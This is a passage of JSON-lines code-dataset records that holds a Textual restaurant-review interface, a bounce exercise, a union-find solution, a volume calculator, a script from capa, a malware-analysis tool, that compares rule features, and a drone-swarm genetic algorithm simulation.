'get_rest_rev()', 'See Restaurant Reviews')]\n\n def compose(self):\n yield Header(show_clock=True)\n yield Footer()\n yield Static(\"View Relations\", classes=\"title\")\n with Container(id='buttons'):\n yield Button(\"View Restaurants in Towns\", id='one')\n yield Button (\"View Reviews for Restaurants\", id='two')\n yield Container(id=\"target\")\n yield Static(id=\"retrieved\")\n\n def on_button_pressed(self, event:Button.Pressed):\n if event.button.id == \"one\":\n self.action_get_towns_rest()\n elif event.button.id == \"two\":\n self.action_get_rest_rev()\n\n def action_get_towns_rest(self):\n towns = CLI.model.towns\n rests = CLI.model.restaurants\n self.query_one(\"#retrieved\").remove()\n table = DataTable(id=\"retrieved\", name=\"Container\", zebra_stripes=True)\n table.add_columns(\"Town\", \"Restaurants\")\n for town in towns:\n table.add_row(town.name, None)\n for rest in rests:\n if rest.town_id == town.id:\n table.add_row(None, rest.name)\n self.query_one(\"#target\").mount(table)\n\n def action_get_rest_rev(self):\n rests = CLI.model.restaurants\n revs = CLI.model.reviews\n towns = CLI.model.towns\n self.query_one(\"#retrieved\").remove()\n table = DataTable(id=\"retrieved\", name=\"Container\", zebra_stripes=True)\n table.add_columns(\"Town\", \"Restaurant\", \"Review\", \"Stars\")\n for town in towns:\n table.add_row(town.name, None, None, None)\n for rest in rests:\n if rest.town_id == town.id:\n table.add_row(None, rest.name, None, None)\n for rev in revs:\n if rev.restaurant_id == rest.id:\n table.add_row(None, None, rev.review_text, rev.review_rating)\n self.query_one(\"#target\").mount(table)\n\n\nclass AddPage(Screen):\n \"\"\"Add\"\"\"\n\n BINDINGS=[('q', \"pop_screen()\", \"Go Back\"),('t', 'add_town()', \"Add Town\"),('r', 'add_rest()', \"Add Restaurant\"),('v', 'add_rev()', \"Add Review\")]\n\n\n def compose(self):\n yield Header(show_clock=True)\n yield Footer()\n yield Static(\"Add Data Page\", classes=\"title\")\n yield Container(id=\"listswitch\")\n yield DataTable(id=\"listview\")\n with Horizontal(id=\"buttons\"):\n yield Button(\"Add Town\", id=\"town\")\n yield Button(\"Add Restaurant\", id=\"rest\")\n yield Button(\"Add Review\", id=\"rev\")\n with ContentSwitcher(id=\"switcher\", initial=\"town\"):\n with Container(id=\"town\"):\n yield Input(placeholder=\"Town Name\", id=\"town_name\")\n yield Input(placeholder=\"Town State\", id=\"town_state\")\n yield Button(\"Submit\", id=\"town_submit\")\n with Container(id=\"rest\"):\n yield Input(placeholder=\"Restaurant Name\", id=\"rest_name\")\n yield Input(placeholder=\"Address\", id=\"rest_address\")\n yield Input(placeholder=\"Phone\", id=\"rest_phone\")\n yield Input(placeholder=\"Residing Town ID\", id=\"rest_town\")\n yield Button(\"Submit\", id=\"rest_submit\")\n with Container(id=\"rev\"):\n yield Input(placeholder=\"Rating Text\", id=\"rev_text\")\n yield Input(placeholder=\"Stars\", id=\"rev_stars\")\n yield Input(placeholder=\"Pertaining Restaurant ID\", id=\"rev_rest\")\n yield Button(\"Submit\", id=\"rev_submit\")\n\n def on_button_pressed(self, event:Button.Pressed):\n #SWITCH BUTTONS\n if event.button.id == \"town\":\n self.query_one(\"#switcher\").current=event.button.id\n self.pop_town()\n if event.button.id == \"rest\":\n self.query_one(\"#switcher\").current=event.button.id\n self.pop_town()\n if event.button.id == \"rev\":\n self.query_one(\"#switcher\").current=event.button.id\n self.pop_rest()\n #END SWITCH BUTTONS\n\n #SUBMIT BUTTONS\n if event.button.id == \"town_submit\":\n town_name 
= self.query_one(\"#town_name\").value\n town_state = self.query_one(\"#town_state\").value\n new_town = Town(name=town_name, state=town_state)\n self.add_town(new_town)\n if event.button.id == \"rest_submit\":\n rest_name = self.query_one(\"#rest_name\").value\n rest_address = self.query_one(\"#rest_address\").value\n rest_phone = self.query_one(\"#rest_phone\").value\n rest_town = self.query_one(\"#rest_town\").value\n new_rest = Restaurant(name=rest_name, address=rest_address, phone=rest_phone, town_id=rest_town)\n self.add_rest(new_rest)\n if event.button.id == \"rev_submit\":\n rev_text = self.query_one(\"#rev_text\").value\n rev_stars = self.query_one(\"#rev_stars\").value\n rev_rest = self.query_one(\"#rev_rest\").value\n new_rev = Review(review_text=rev_text, review_rating=rev_stars, restaurant_id=rev_rest)\n self.add_rev(new_rev)\n #END SUBMIT BUTTONS\n\n #SQL QUERIES\n\n def add_town(self, town):\n session = CLI.model.session\n session.add(town)\n session.commit()\n CLI.model.towns.append(town)\n def add_rest(self, rest):\n session = CLI.model.session\n session.add(rest)\n session.commit()\n CLI.model.restaurants.append(rest)\n def add_rev(self, rev):\n session = CLI.model.session\n session.add(rev)\n session.commit()\n CLI.model.reviews.append(rev)\n \n #END SQL QUERIES\n\n #TABLE OPERATIONS\n\n def add_table(self, table):\n self.query_one('#listview').remove()\n self.query_one(\"#listswitch\").mount(table)\n\n\n def pop_town(self):\n t_t = DataTable(id=\"listview\", zebra_stripes=True)\n towns = CLI.model.towns\n t_t.add_columns(\"ID\", \"Town Name\", \"State\", f\"Length: {len(towns)}\")\n for town in towns:\n t_t.add_row(town.id, town.name, town.state)\n self.add_table(t_t)\n\n def pop_rest(self):\n r_t = DataTable(id=\"listview\", zebra_stripes=True)\n rest = CLI.model.restaurants\n r_t.add_columns(\"ID\", \"Name\", \"Address\", \"Phone\", f\"Length: {len(rest)}\")\n for r in rest:\n r_t.add_row(r.id, r.name, r.address, r.phone)\n self.add_table(r_t)\n \n def pop_rev(self):\n v_t = DataTable(id=\"listview\", zebra_stripes=True)\n rev = CLI.model.reviews\n v_t.add_columns(\"ID\", \"Review\", \"Star Rating\", f\"Length: {len(rev)}\")\n for r in rev:\n v_t.add_row(r.id, r.review_text, r.review_rating)\n self.add_table(v_t)\n\n #END TABLE OPERATIONS\n\n #HOT KEY ACTIONS\n\n def action_add_town(self):\n self.query_one(\"#switcher\").current=\"town\"\n self.pop_town()\n def action_add_rest(self):\n self.query_one(\"#switcher\").current=\"rest\"\n self.pop_town()\n def action_add_rev(self):\n self.query_one(\"#switcher\").current=\"rev\"\n self.pop_rest()\n\n #END HOT KEY ACTIONS\n\nclass AboutPage(Screen):\n\n BINDINGS=[('q', \"pop_screen()\", \"Go Back\")]\n\n def compose(self):\n yield Header(show_clock=True)\n yield Footer()\n yield Static(\"Raymond An\")\n yield Static(\"Mark Coats\")\n yield Static(\"Kyle O'Neill\")\n\n\n\nclass CLI(App):\n \"\"\"A Textual app to find restaurants and reviews.\"\"\"\n\n data = {\n \"username\": ''\n }\n model = Model()\n\n CSS_PATH=\"cli.css\"\n SCREENS= {\"Login\": LoginPage(), \"Menu\": MainPage(), \"Retrieve\": RetrievePage(), \"Relative\": RelativePage(), \"Add\": AddPage(), \"about\": AboutPage()}\n BINDINGS = [('q', \"exit\", 'Exit'),(\"d\", \"toggle_dark\", \"Toggle dark mode\"), (\"p\", \"about\", \"About\")]\n\n def on_mount(self):\n self.push_screen(\"Login\")\n\n def action_toggle_dark(self) -> None:\n \"\"\"An action to toggle dark mode.\"\"\"\n self.dark = not self.dark\n def action_exit(self):\n self.exit(\"Exiting\")\n def 
action_about(self):\n self.push_screen(\"about\")\n\n\nif __name__ == \"__main__\":\n app = CLI()\n app.run()\n","repo_name":"MarKSmaN98/P3P_P2","sub_path":"lib/textualInterface.py","file_name":"textualInterface.py","file_ext":"py","file_size_in_byte":13587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"15998921412","text":"\"\"\"\n6. A ball falls from a height of 100 m and bounces back to half its previous height each time.\n Calculate: how many times it bounces up in total (minimum bounce height 0.01 m)\n and how many meters it travels in total.\n\"\"\"\n\nheight = 100\ncount = 0\ndistance = 0\n\nwhile height >= 0.01:\n # The condition above could also be written as height/2 >= 0.01, which makes the count come out right,\n # but then the distance of the last bounce is not added in, so the code below changes as well, as shown after line 21.\n count += 1 # add 1 to the count on every touchdown\n height = 0.5 * height\n distance += 3 * height\n\nprint(f\"Total bounces: {count-1}\") # the ball does not bounce up after the last touchdown, so subtract 1 from the count\nprint(f\"Total bounce height: {distance-height:0.2f} m\") # likewise, the bounce height after the last touchdown was already added in the loop above, so it must be subtracted again\n\nheight = 100\ncount = 0\ndistance = 0\n\nwhile height/2 >= 0.01:\n count += 1\n height = 0.5 * height\n distance += 3 * height\n\nprint(f\"Total bounces: {count}\")\nprint(f\"Total bounce height: {distance+height:0.2f} m\")\n","repo_name":"bayernerxz/Tedu_Python","sub_path":"stage01/code/day05/review/exercise04.py","file_name":"exercise04.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"41159777164","text":"class Union_find:\r\n def __init__(self, n):\r\n self.par: list[int] = [x for x in range(n + 1)]\r\n self.rank: list[int] = [0] * (n + 1)\r\n\r\n def root(self, x) -> int:\r\n if self.par[x] == x:\r\n return x\r\n else:\r\n self.par[x] = self.root(self.par[x]) # path compression\r\n return self.par[x]\r\n\r\n def union(self, x, y) -> None:\r\n if self.root(x) == self.root(y):\r\n return None\r\n else:\r\n if self.rank[x] >= self.rank[y]:\r\n self.par[self.root(y)] = self.par[self.root(x)]\r\n else:\r\n self.par[self.root(x)] = self.par[self.root(y)]\r\n\r\n\r\nn, q = map(int, input().split())\r\nuf = Union_find(n)\r\nfor _ in range(q):\r\n t, u, v = map(int, input().split())\r\n if t == 0:\r\n uf.union(u, v)\r\n else:\r\n if uf.root(u) == uf.root(v):\r\n print(1)\r\n else:\r\n print(0)\r\n","repo_name":"xmkp2469/Disjoint-Set-Union","sub_path":"Disjoint Set Union/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"7734595813","text":"#Nicholas Gardi Assignment 2\r\n\r\n#import math to use the exact value of pi\r\nimport math\r\n\r\n#defining the function for volume of a cube\r\ndef cubeVolume(sideLength):\r\n sideLength = float(input(\"Enter the side length of the cube: \"))\r\n volume = sideLength ** 3\r\n return volume\r\n\r\n#defining the function for volume of a pyramid\r\ndef pyramidVolume(baseLength, heightLength):\r\n baseLength = float(input(\"Enter the base length of the pyramid: \"))\r\n heightLength = float(input(\"Enter the height length of the pyramid: \"))\r\n volume = (1/3)*(baseLength ** 2)*(heightLength)\r\n return volume\r\n\r\n#defining the function for volume of an ellipsoid\r\ndef ellipsoidVolume(radiusLength):\r\n radiusLength = float(input(\"Enter the length of the radius of the ellipsoid: \"))\r\n volume = (4/3)*(math.pi)*(radiusLength ** 3)\r\n return volume\r\n\r\n#defining the lists to contain the final volumes\r\ncubeList = []\r\npyramidList = []\r\nellipsoidList = []\r\n\r\n#while loop to continue asking for inputs until the user types in quit\r\ni = 1\r\nwhile i > 0:\r\n shape = input(\"Enter the shape(Cube, Pyramid, Ellipsoid) for which you 
would like to calculate the volume of, or type 'quit' to end the program: \").lower()\r\n #validating the user input\r\n if shape not in (\"cube\", \"pyramid\", \"ellipsoid\", \"quit\"):\r\n print(\"Please enter one of the following choices below: cube, pyramid, ellipsoid, or quit.\")\r\n #calling the cube volume function and adding the answer to the list\r\n if shape == \"cube\":\r\n sideLength = 0\r\n cubeList.append(cubeVolume(sideLength))\r\n #calling the pyramid volume function and adding the answer to the list\r\n if shape == \"pyramid\":\r\n baseLength = 0\r\n heightLength = 0\r\n pyramidList.append(pyramidVolume(baseLength, heightLength))\r\n #calling the ellipsoid volume function and adding the answer to the list\r\n if shape == \"ellipsoid\":\r\n radiusLength = 0\r\n ellipsoidList.append(ellipsoidVolume(radiusLength))\r\n if shape == \"quit\":\r\n #stopping the while loop and printing out the required strings/volumes\r\n if cubeList == [] and pyramidList == [] and ellipsoidList == []:\r\n i = -1\r\n print(\"You have come to the end of the session.\")\r\n print(\"You did not perform any volume calculations\")\r\n else:\r\n #sorting the lists\r\n cubeList.sort()\r\n pyramidList.sort()\r\n ellipsoidList.sort()\r\n i = -1\r\n print(\"You have come to the end of the session.\")\r\n print(\"The volumes calculated for each shape are shown below\")\r\n print(\"Cube: \" + str(cubeList)[1:-1])\r\n print(\"Pyramid: \" + str(pyramidList)[1:-1])\r\n print(\"Ellipsoid: \" + str(ellipsoidList)[1:-1])\r\n","repo_name":"NickGardi/CS1026-Python","sub_path":"VolumeCalculator.py","file_name":"VolumeCalculator.py","file_ext":"py","file_size_in_byte":2785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31049848095","text":"import sys\nimport logging\nimport argparse\nfrom typing import Set\nfrom pathlib import Path\n\nimport capa.main\nimport capa.rules\nfrom capa.features.common import Feature\n\nlogger = logging.getLogger(\"detect_duplicate_features\")\n\n\ndef get_features(rule_path: str) -> Set[Feature]:\n \"\"\"\n Extracts all features from a given rule file.\n\n Args:\n rule_path (str): The path to the rule file to extract features from.\n\n Returns:\n set: A set of all feature statements contained within the rule file.\n \"\"\"\n with Path(rule_path).open(\"r\", encoding=\"utf-8\") as f:\n try:\n new_rule = capa.rules.Rule.from_yaml(f.read())\n return new_rule.extract_all_features()\n except Exception as e:\n logger.error(\"Error: New rule %s %s %s\", rule_path, str(type(e)), str(e))\n sys.exit(-1)\n\n\ndef find_overlapping_rules(new_rule_path, rules_path):\n if not new_rule_path.endswith(\".yml\"):\n logger.error(\"FileNotFoundError ! 
New rule file name doesn't end with .yml\")\n sys.exit(-1)\n\n # Load the features of the new rule into a set.\n new_rule_features = get_features(new_rule_path)\n count = 0\n overlapping_rules = []\n\n # capa.rules.RuleSet stores all rules in given paths\n ruleset = capa.main.get_rules(rules_path)\n\n for rule_name, rule in ruleset.rules.items():\n rule_features = rule.extract_all_features()\n\n if not len(rule_features):\n continue\n count += 1\n # Checks if any features match between existing and new rule.\n if any(feature in rule_features for feature in new_rule_features):\n overlapping_rules.append(rule_name)\n\n result = {\"overlapping_rules\": overlapping_rules, \"count\": count}\n return result\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Find overlapping features in Capa rules.\")\n\n parser.add_argument(\"rules\", type=str, action=\"append\", help=\"Path to rules\")\n parser.add_argument(\"new_rule\", type=str, help=\"Path to new rule\")\n\n args = parser.parse_args()\n\n new_rule_path = args.new_rule\n rules_path = [Path(rule) for rule in args.rules]\n\n result = find_overlapping_rules(new_rule_path, rules_path)\n\n print(\"\\nNew rule path : %s\" % new_rule_path)\n print(\"Number of rules checked : %s \" % result[\"count\"])\n if result[\"overlapping_rules\"]:\n print(\"Paths to overlapping rules : \")\n for r in result[\"overlapping_rules\"]:\n print(\"- %s\" % r)\n else:\n print(\"Paths to overlapping rules : None\")\n print(\"Number of rules containing same features : %s\" % len(result[\"overlapping_rules\"]))\n print(\"\\n\")\n\n return len(result[\"overlapping_rules\"])\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"mandiant/capa","sub_path":"scripts/detect_duplicate_features.py","file_name":"detect_duplicate_features.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","stars":3385,"dataset":"github-code","pt":"47"} +{"seq_id":"8547858214","text":"import numpy as np\nimport math\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom copy import deepcopy\nfrom matplotlib import animation\nfrom matplotlib import rc\n####################### Defining Project Constants ############################\n\n## System Parameters\nNm = 15 # number of initial agents\nNo = 25 # number of obstacles\nNt = 100 # number of targets to map\n\n## Physical Parameters\nAi = 1 # agent characteristic area (m^2)\nCdi = 0.25 # agent coefficient of drag\nmi = 10 # agent mass (kg)\nva = [-0.2, 0.2, 0.5] # Air velocity (m/s)\nra = 1.225 # Air Density (kg/m^3)\nFp = 200 # Propulsion force magnitude (N)\n\n## Time Stepping Parameters\ndt = 0.2 # time step size (s)\ntf = 60 # Maximum task time (s)\n\n## Object Interaction Parameters\nagent_sight = 5 # maximum target mapping distance\ncrash_range = 2 # agent collision distance\n\n## Genetic Algorithm Parameters\nK = 6 # Strings generated by breeding\nP = 6 # Surviving strings for breeding\nS = 20 # Design strings per generation\nG = 100 # Total Generations\nminLam = 0. # Minimum value of design strings\nmaxLam = 2. 
# Maximum value of design strings\nnumLam = 15\n\nw1 = 70 # Weight of mapping in net cost\nw2 = 10 # Weight of time usage in net cost\nw3 = 20 # Weight of agent losses in net cost\n\n## Domain Parameters\nxmax = 150 # x bound of domain\nymax = 150 # y bound of domain\nzmax = 60 # z bound of domain\n\nlocx = 100 # x bound of target/obstacle region \nlocy = 100 # y bound of target/obstacle region \nlocz = 10 # z bound of target/obstacle region \n\n## Initial Target, Obstacle, Agent Positions\nobs = np.array([(locx - (-locx))*np.random.rand(No) + (-locx), (locy - (-locy))*np.random.rand(No) + (-locy),\n (locz - (-locz))*np.random.rand(No) + (-locz)]) # Initial Obstacle Locations\n\nobs = obs.T\n\ntar = np.array([(locx - (-locx))*np.random.rand(Nt) + (-locx), (locy - (-locy))*np.random.rand(Nt) + (-locy),\n (locz - (-locz))*np.random.rand(Nt) + (-locz)]) # Initial Target Locations\n\ntar = tar.T\ntar0 = deepcopy(np.array(tar))\npos = np.array([(xmax - 0.05*xmax)*np.ones(Nm), np.linspace(-ymax + 0.05*ymax, ymax - 0.05*ymax, Nm), \n np.zeros(Nm)]) # Initial Agent Location\n\npos = pos.T\n\npos0 = deepcopy(np.array(pos))\n\nvel = np.zeros([Nm,3]) # Initial Agent velocities\nvel0 = np.zeros([Nm,3])\n###############################################################################\n############################## Plotting Initial System ########################\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nax.scatter(obs[:,0],obs[:,1],obs[:,2],color = 'r')\nax.scatter(tar[:,0],tar[:,1],tar[:,2],color = 'g')\nax.scatter(pos[:,0],pos[:,1],pos[:,2],color = 'k')\nax.set_xlabel('X (m)')\nax.set_ylabel('Y (m)')\nax.set_zlabel('Z (m)')\nax.view_init(elev=70., azim=40)\nax.legend(['Obstacles','Targets','Agents'])\n################################## Drone Simulation Function ####################################################\n\ndef droneSim(Nm,No,Nt,w1,w2,w3,Lam,dt,tf,pos,vel,tar,obs):\n\n Nt0 = Nt # Saving initial number of targets for cost calculation\n Nm0 = Nm # Saving initial number of agents for cost calculation\n \n # Assigning design string to associated variables \n Wmt = Lam[0] \n Wmo = Lam[1] \n Wmm = Lam[2] \n\n wt1 = Lam[3]\n wt2 = Lam[4]\n \n wo1 = Lam[5] \n wo2 = Lam[6]\n \n wm1 = Lam[7] \n wm2 = Lam[8]\n \n a1 = Lam[9]\n a2 = Lam[10] \n\n b1 = Lam[11]\n b2 = Lam[12]\n\n c1 = Lam[13]\n c2 = Lam[14]\n\n\n ts = int(np.ceil(tf/dt)) # Max Number of time steps\n\n c = 0 # counter for actual number of time steps\n\n # Initialize agent and target position arrays for plotting\n posTot = list()\n tarTot = list()\n\n posTot.append(deepcopy(np.array(pos))) # array to save all positions of agents at every time step\n tarTot.append(deepcopy(np.array(tar))) # array to save all positions of targets at every time step\n\n for i in range(ts): # Loop through all time\n \n if Nt <= 0 or Nm <= 0: # If all targets are mapped or all agents are lost, stop simulating\n break\n\n c = c + 1 # Keep track of time step\n\n # Initialize distance arrays between targets, agents, and obstacles\n dmt = np.array(np.zeros((3,Nm,Nt)))\n dmm = np.array(np.zeros((3,Nm,Nm)))\n dmo = np.array(np.zeros((3,Nm,No)))\n\n\n # Loop through agents\n for j in range(Nm):\n \n dmt[:,j,:] = np.array((tar - pos[j,:]).T) # distance b/w agent j and all targets\n\n dmm[:,j,:] = np.array((pos - pos[j,:]).T) # distance b/w agent j and all other agents\n \n dmm[:,j,j] = float('inf') # Marker so we are not considering distance between agent and itself\n\n dmo[:,j,:] = np.array((obs - pos[j,:]).T) # distance b/w agent j and all obstacles\n\n\n 
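# (added note) dmt/dmm/dmo hold componentwise offsets with shapes (3,Nm,Nt), (3,Nm,Nm), (3,Nm,No); their norms below give pairwise distances\n 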
# Calculate magnitude of distances between all objects\n magdmt = np.array(np.linalg.norm(dmt,2,0))\n magdmm = np.array(np.linalg.norm(dmm,2,0))\n magdmo = np.array(np.linalg.norm(dmo,2,0))\n\n # Determine which targets have been mapped\n tar_map = np.array(np.where(magdmt < agent_sight)) #produces 2 1-D arrays: 1st array:row, 2nd array:column\n\n # Determine which agents have crashed into one another\n mm_crash = np.array(np.where(magdmm < crash_range))\n\n # Determine which agents have crashed into obstacles\n mo_crash = np.array(np.where(magdmo < crash_range))\n\n # Determine which agents have moved outside domain in each dimension\n x_crash = np.array(np.where(np.abs(pos[:,0]) > xmax))\n y_crash = np.array(np.where(np.abs(pos[:,1]) > ymax))\n z_crash = np.array(np.where(np.abs(pos[:,2]) > zmax))\n\n # Combine all domain crashes together (unique since there could be overlap)\n dom_crash = np.unique(np.hstack((x_crash[0,:], y_crash[0,:], z_crash[0,:])))\n\n # Generate index arrays to determine which targets to remove and which agents to remove\n tarRem = np.array(np.unique(tar_map[1,:])) #access the column indices for tar_map --> target indices\n ageRem = np.unique(np.hstack([mm_crash[0,:], mo_crash[0,:], dom_crash])) #access the row indices for mm/mo --> agent/obstacle indices\n \n # use -inf as marker to distinguish between agent j-j marker and remove agent marker\n magdmm[magdmm == float('inf')] = float('-inf')\n dmm[dmm == float('inf')] = float('-inf')\n\n if (tarRem.size > 0 or ageRem.size > 0): # Only remove objects if targets mapped or agents crash\n\n # Determine new number of targets and new number of agents\n Nt = Nt - np.size(tarRem)\n Nm = Nm - np.size(ageRem)\n \n if Nt <= 0 or Nm <= 0: # If all targets are mapped or all agents are lost, stop simulating\n break\n \n if tarRem.size > 0: # If statement for target mapping\n \n # Use +inf as remove target marker\n magdmt[:,tarRem] = float('inf')\n dmt[:,:,tarRem] = float('inf')\n tar[tarRem,:] = float('inf')\n \n if ageRem.size > 0:\n \n # Use +inf as remove agent marker\n magdmt[ageRem,:] = float('inf')\n dmt[:,ageRem,:] = float('inf')\n magdmm[ageRem,:] = float('inf')\n magdmm[:,ageRem] = float('inf')\n dmm[:,ageRem,:] = float('inf')\n dmm[:,:,ageRem] = float('inf')\n magdmo[ageRem,:] = float('inf')\n dmo[:,ageRem,:] = float('inf')\n pos[ageRem,:] = float('inf')\n vel[ageRem,:] = float('inf')\n\n # Remove and reshape arrays to account for removal of all targets and agents\n magdmt = np.array(np.reshape(magdmt[magdmt != float('inf')],[Nm,Nt]))\n dmt = np.array(np.reshape(dmt[dmt != float('inf')],[3,Nm,Nt]))\n magdmo = np.array(np.reshape(magdmo[magdmo != float('inf')],[Nm,No]))\n dmo = np.array(np.reshape(dmo[dmo != float('inf')],[3,Nm,No]))\n magdmm = np.array(np.reshape(magdmm[magdmm != float('inf')],[Nm,Nm]))\n dmm = np.array(np.reshape(dmm[dmm != float('inf')],[3,Nm,Nm]))\n pos = np.array(np.reshape(pos[pos != float('inf')],[Nm,3]))\n vel = np.array(np.reshape(vel[vel != float('inf')],[Nm,3]))\n tar = np.array(np.reshape(tar[tar != float('inf')],[Nt,3]))\n\n tarTot.append(tar[:]) # save new target positions\n \n # Remove and reshape array for j-j agent interactions which we ignore \n magdmm = np.array(np.reshape(magdmm[magdmm != float('-inf')],[Nm,Nm-1]))\n dmm = np.array(dmm[dmm != float('-inf')])\n dmm = np.reshape(dmm,[3,Nm,Nm-1])\n\n # Calculate unit normal vector between all objects\n nmt = dmt / magdmt[np.newaxis,:,:]\n nmm = dmm / magdmm[np.newaxis,:,:]\n nmo = dmo / magdmo[np.newaxis,:,:]\n\n \n # Calculate scaled direction 
vectors between objects\n nhatmt = (wt1*np.exp(-a1*magdmt) - wt2*np.exp(-a2*magdmt))\n nhatmt = nhatmt[np.newaxis,:,:]*nmt\n\n nhatmm = (wm1*np.exp(-c1*magdmm) - wm2*np.exp(-c2*magdmm))\n nhatmm = nhatmm[np.newaxis,:,:]*nmm\n\n nhatmo = (wo1*np.exp(-b1*magdmo) - wo2*np.exp(-b2*magdmo))\n nhatmo = nhatmo[np.newaxis,:,:]*nmo\n\n # Sum up all interaction vectors for each agent\n Nmt = np.sum(nhatmt,2)\n Nmm = np.sum(nhatmm,2)\n Nmo = np.sum(nhatmo,2)\n\n # Calculate the total force vectors for each agent\n Ntot = (Wmt*Nmt.T + Wmm *Nmm.T + Wmo*Nmo.T)\n\n # Obtain magnitude of force vector\n nDum = np.linalg.norm(Ntot,2,1)\n\n # Normalize force vector for each agent\n nstar = Ntot / nDum[:,np.newaxis]\n\n # Calculate drag force on all agents\n Fd = 0.5*ra*Cdi*Ai*((va-vel).T*np.linalg.norm(va - vel,2,1)).T\n\n # Calculate the total force on all agents\n Ftot = Fp*nstar + Fd\n\n # Update the velocity for each agent using forward Euler\n vel += dt*Ftot/mi\n\n # Update the position for each agent using forward Euler\n pos += (vel*dt)\n\n # Save the position of each agent\n posTot.append(pos[:])\n \n # Calculate Mstar, Tstar, Lstar for cost calculation\n Mstar = (Nt/Nt0)\n Tstar = ((c*dt)/tf)\n Lstar = ((Nm0 - Nm)/Nm0)\n \n # Calculate the cost for this simulation\n Pi = w1*Mstar + w2*Tstar + w3*Lstar\n \n return(Pi, posTot, tarTot, c, Mstar,Tstar,Lstar)\n################################# Genetic Algorithm Function #######################################################\n\ndef myGA(S,G,P,K,minLam,maxLam,numLam,Nm,No,Nt,w1,w2,w3,dt,tf,pos,vel):\n \n # Initialize all variables to be saved\n Min = np.zeros(G) # Minimum cost for each generation\n PAve = np.zeros(G) # Parent average for each generation\n Ave = np.zeros(G) # Total population average for each generation\n \n Pi = np.zeros(S) # All costs in an individual generation\n Mstar = np.zeros(S) # All Mstar values in each generation\n Tstar = np.zeros(S) # All Tstar values in each generation\n Lstar = np.zeros(S) # All Lstar values in each generation\n \n MstarMin = np.zeros(G) # Mstar value associated with best cost for each generation\n TstarMin = np.zeros(G) # Tstar value associated with best cost for each generation\n LstarMin = np.zeros(G) # Lstar value associated with best cost for each generation\n \n MstarPAve = np.zeros(G) # Average Mstar value for top parents for each generation\n TstarPAve = np.zeros(G) # Average Tstar value for top parents for each generation\n LstarPAve = np.zeros(G) # Average Lstar value for top parents for each generation\n \n MstarAve = np.zeros(G) # Average Mstar value for whole population for each generation\n TstarAve = np.zeros(G) # Average Tstar value for whole population for each generation\n LstarAve = np.zeros(G) # Average Lstar value for whole population for each generation\n \n # Generate initial random population\n Lam = (maxLam - minLam)*np.random.rand(numLam,S) + minLam\n \n # Initially, calculate cost for all strings. 
After, only calculate new strings since top P already calculated\n start = 0 \n \n for i in range(G): # Loop through generations\n \n # Calculate fitness of unknown design string costs\n for j in range(start,S): # Evaluate fitness of strings\n Pi[j], _, _, _, Mstar[j], Tstar[j], Lstar[j] = droneSim(Nm,No,Nt,w1,w2,w3,Lam[:,j],dt,tf,pos,vel,tar,obs)\n \n \n # Sort cost and design strings based on performance\n ind = np.argsort(Pi)\n Pi = np.sort(Pi)\n Lam = Lam[:,ind]\n Mstar = Mstar[ind]\n Tstar = Tstar[ind]\n Lstar = Lstar[ind]\n \n # Generate offspring random parameters and indices for vectorized offspring calculation\n phi = np.random.rand(numLam,K)\n ind1 = range(0,K,2)\n ind2 = range(1,K,2)\n \n # Concatenate original parents, children, and new random strings all together into new design string array\n Lam = np.hstack((Lam[:,0:P], phi[:,ind1]*Lam[:,ind1] + (1-phi[:,ind1])*Lam[:,ind2],\n phi[:,ind2]*Lam[:,ind2] + (1-phi[:,ind2])*Lam[:,ind1], \n (maxLam - minLam)*np.random.rand(numLam,S-P-K) + minLam))\n \n # Save all requested values\n Min[i] = Pi[0]\n PAve[i] = np.mean(Pi[0:P])\n Ave[i] = np.mean(Pi)\n \n MstarMin[i] = Mstar[0]\n TstarMin[i] = Tstar[0]\n LstarMin[i] = Lstar[0]\n \n MstarPAve[i] = np.mean(Mstar[0:P])\n TstarPAve[i] = np.mean(Tstar[0:P])\n LstarPAve[i] = np.mean(Lstar[0:P])\n \n MstarAve[i] = np.mean(Mstar)\n TstarAve[i] = np.mean(Tstar)\n LstarAve[i] = np.mean(Lstar)\n \n # Update start to P such that only new string cost values are calculated\n start = P\n \n # Print minimum value of cost for debugging (should monotonically decrease over generations)\n print(Min[i])\n \n return(Lam, Pi, Min, PAve, Ave, MstarMin, TstarMin, LstarMin, MstarPAve, TstarPAve, LstarPAve, \n MstarAve, TstarAve, LstarAve)\n\n# Call GA function\nLam, Pi, Min, PAve, Ave, MstarMin, TstarMin, LstarMin, MstarPAve, TstarPAve, LstarPAve, MstarAve, TstarAve, LstarAve= myGA(S,G,P,K,minLam,maxLam,numLam,Nm,No,Nt,w1,w2,w3,dt,tf,pos,vel)\nfig1 = plt.figure(figsize=(12,5))\nplt.semilogy(range(0,G),Min)\nplt.semilogy(range(0,G),PAve)\nplt.semilogy(range(0,G),Ave)\nplt.xlabel('Generation')\nplt.ylabel('Min or Ave cost')\nplt.title('Cost Evolution')\nplt.legend(['Best Cost', 'Average Parent Cost','Average Cost'])\nplt.show()\n\nfig2 = plt.figure(figsize=(12,5))\nplt.plot(range(0,G),MstarMin)\nplt.plot(range(0,G),TstarMin)\nplt.plot(range(0,G),LstarMin)\nplt.xlabel('Generation')\nplt.ylabel('Cost Parameter Value')\nplt.title('Best Cost Parameter Evolution')\nplt.legend(['M*', 'T*','L*'])\nplt.show()\n\nfig3 = plt.figure(figsize=(12,5))\nplt.plot(range(0,G),MstarPAve)\nplt.plot(range(0,G),TstarPAve)\nplt.plot(range(0,G),LstarPAve)\nplt.xlabel('Generation')\nplt.ylabel('Cost Parameter Value')\nplt.title('Parent Average Cost Parameter Evolution')\nplt.legend(['M*', 'T*','L*'])\nplt.show()\n\nfig4 = plt.figure(figsize=(12,5))\nplt.plot(range(0,G),MstarAve)\nplt.plot(range(0,G),TstarAve)\nplt.plot(range(0,G),LstarAve)\nplt.xlabel('Generation')\nplt.ylabel('Cost Parameter Value')\nplt.title('Population Average Cost 